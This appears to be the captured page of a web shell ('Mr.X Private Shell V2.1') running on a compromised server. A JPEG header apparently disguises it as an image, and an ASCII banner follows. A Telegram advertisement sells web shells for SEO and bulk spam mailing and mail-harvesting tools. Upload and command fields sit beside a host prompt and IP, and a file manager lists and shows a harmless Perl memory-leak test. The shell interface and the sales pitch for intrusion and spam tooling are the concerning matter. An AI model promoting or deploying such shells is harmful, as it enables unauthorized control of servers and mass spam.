����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
#!perl -w

use strict;
use Test::More tests => 1;
use Test::LeakTrace qw(:test);


{
	package X;
	use Scalar::Util qw(weaken);

	sub new{
		my($class) = @_;

		my $self = bless {}, $class;

		return $self;
	}

	sub set_other{
		my($self, $other) = @_;
		weaken($self->{other} = $other) if $other;
		return $self;
	}
}

no_leaks_ok{
	my $a = X->new;
	my $b = X->new;

	$a->set_other($b);
	$b->set_other($a);

};

Filemanager

Name Type Size Permission Actions
callback.pl File 214 B 0644
leaked_refs.pl File 185 B 0644
leaktrace.t File 332 B 0644
method_cache.pl File 192 B 0644
script.pl File 157 B 0644
simple.pl File 130 B 0644
test_fail.pl File 148 B 0644
weakref.pl File 411 B 0644